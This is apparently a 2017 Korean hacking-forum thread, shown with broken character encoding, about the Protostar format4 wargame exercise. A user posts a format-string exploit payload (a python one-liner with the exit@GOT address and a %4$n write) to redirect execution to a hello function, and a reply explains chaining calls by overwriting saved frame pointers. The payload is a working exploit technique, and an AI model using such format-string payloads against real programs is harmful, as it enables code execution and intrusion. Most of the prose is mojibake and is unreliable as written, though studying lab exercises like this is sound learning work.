½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tkakr7458
   format string bug + got overwite

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1864 [º¹»ç]


ÈåÀ¸.. »çÁøÀ» ¸ø¿Ã·Á¼­ ¼³¸íÇϱâ Èûµå³×¿ä ¤Ð¤Ð

https://exploit-exercises.com/protostar/format4/

À§ ÁÖ¼Ò´Â ¼Ò½º À̱¸¿ä

exit ¸¦ hello À¸·Î overwite ÇÒ¶ó°í ÇÕ´Ï´Ù.

hello = 0x080484b4 ÀÌ°í
exit@got = 0x8049718 ÀÔ´Ï´Ù.

format offsetÀº 4 ÀÔ´Ï´Ù. ( "AAAA %x%x%x%x" ÇßÀ»¶§ 4 ¹ø°¿¡ ³ª¿È)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n")
                                exit@got                helleÁ¤¼ö-4

ÀÌ·±½ÄÀ¸·Î Çϸé overwite°¡ µÇ´Â°ÍÀº ¾Ë°Ú´Âµ¥ ¿¬¼ÓÇؼ­ hello¸¦ È£ÃâÇÏ´Â ¹æ¹ýÀ» ¸ô¸£°Ú½À´Ï´Ù. µµ¿ÍÁֽʼî¤Ð¤Ð
  Hit : 3056     Date : 2017/04/19 08:28


    
ÇØÄð·¯ ÀÌ ¹®Á¦ ÀÚüÀÇ Àǵµ´Â hello¸¦ Çѹø¸¸ È£ÃâÇ϶õ°Çµ¥, hello¿¡ _exitÀÌ À־ ¾îÂ÷ÇÇ hello°£´ÙÀ½¿¡ Á¾·áÇÏ°ÚÁö¸¸ ¸¸¾à¿¡ ¾ø´Â »óȲ¿¡¼­ ¿¬¼ÓÇؼ­ È£ÃâÇÏ´Â ¹æ¹ýÀº ½ºÅÃÀ» µ¤¾î¾ß ÇÕ´Ï´Ù
exitÇÔ¼öÀÇ GOT¸¦ ÀÎÀÚ 1À» ¹Þ¾Æµµ Á¤»óÁøÇàÇÏ´Â ÇÔ¼ö ¿¹¸¦µé¾î execve·Î µ¤°í(execve´Â ÀÎÀÚ°¡ À߸øµÇµµ ÇÁ·Î±×·¥ÀÌ Á¾·áµÇÁö ¾Ê½À´Ï´Ù)
±×´ÙÀ½¿¡ sfpÀÇ Æ÷ÀÎÅ͸¦ ã½À´Ï´Ù, Áï mainÇÔ¼öÀÇ sfp¸¦ vulnÇÔ¼öÀÇ sfp°¡ °¡¸£Å°°í ÀÖÀ¸´Ï vulnÇÔ¼öÀÇ sfp¿¡ %nÀ¸·Î ÁÖ¼Ò¸¦ µ¤¾î¼­ mainÇÔ¼öÀÇ retºÎÅÍ Âß ÆäÀ̷ε带 fsb·Î µ¤À¸¸é fsb·Îµµ call chainingÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù		 2017/04/20  
ÇØÄð·¯ http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20  
tkakr7458 °¨»çÇÕ´Ï´Ù. ¤Ð¤Ð 2017/04/20